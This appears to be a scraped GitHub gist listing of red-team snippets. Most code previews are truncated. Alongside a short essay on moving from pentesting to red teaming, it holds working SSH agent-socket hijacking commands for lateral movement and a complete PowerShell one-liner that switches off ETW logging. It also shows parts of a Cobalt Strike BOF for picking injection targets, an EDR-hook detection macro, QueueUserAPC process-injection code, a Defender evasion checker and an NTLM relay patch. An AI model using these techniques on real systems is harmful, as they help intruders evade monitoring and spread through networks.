Skip to content

Instantly share code, notes, and snippets.

View chryzsh's full-sized avatar

crusher chryzsh

493 followers · 7 following
View GitHub Profile
@dmchell
dmchell / getnamedpipes.cs
Created January 31, 2021 18:43
using System.IO;
using System;
namespace GetNamedPipes
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("[*] Found the following pipes:");
@jaredhaight
jaredhaight / RedTeamThoughts.md
Created January 22, 2021 19:45
A response to a DM on twitter asking about making the transition from pentesting to red teaming

I think there’s a couple fronts that make a good red teamer. The technical side of being operator is less about knowing how to use tools (that’s easy to teach) and more about knowing how the technologies you’re attacking works. Having an understanding of how things work at a company gives you the context of how to attack and abuse it.

For example the stronger your sysadmin skills, the better you’re going to be at moving through an enterprise. Stuff like knowing how group policies work, having a solid understanding of AD. It’s all about having that context so you know how to abuse it. Having a development background gives you the context of how to abuse CI/CD systems and such. Knowing how kubernetes, how cloud works, gives you context on how to maneuver around it. Honestly, I don’t think I’ve used a single exploit in red teaming (which probably means I’ve left stuff on the table and made life harder for myself lol), it’s all been about finding and abusing misconfigurations in environments.

I think in a tru

@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@G0ldenGunSec
G0ldenGunSec / EnumCLR.c
Last active April 5, 2025 15:38
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@jfmaes
jfmaes / DInjectQueuerAPC.cs
Created November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@daddycocoaman
daddycocoaman / pydefendercheck.py
Last active July 2, 2023 22:13
PyDefenderCheck
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
@sploutchy
sploutchy / rpcrelayclientserver.patch
Created September 9, 2020 09:56
RPC Relay Client and Server Patch
From 53256e4b29331df20a5977b54c1741b2adc30394 Mon Sep 17 00:00:00 2001
From: root <[email protected]>
Date: Wed, 9 Sep 2020 11:54:00 +0200
Subject: [PATCH] RPC Relay client and server
---
examples/ntlmrelayx.py | 12 +-
impacket/dcerpc/v5/dcomrt.py | 30 +-
impacket/dcerpc/v5/rpcrt.py | 624 ++++++++++++++++--
.../examples/ntlmrelayx/attacks/rpcattack.py | 95 +++
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / DisablePSEtw.ps1
Created August 11, 2020 07:53
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)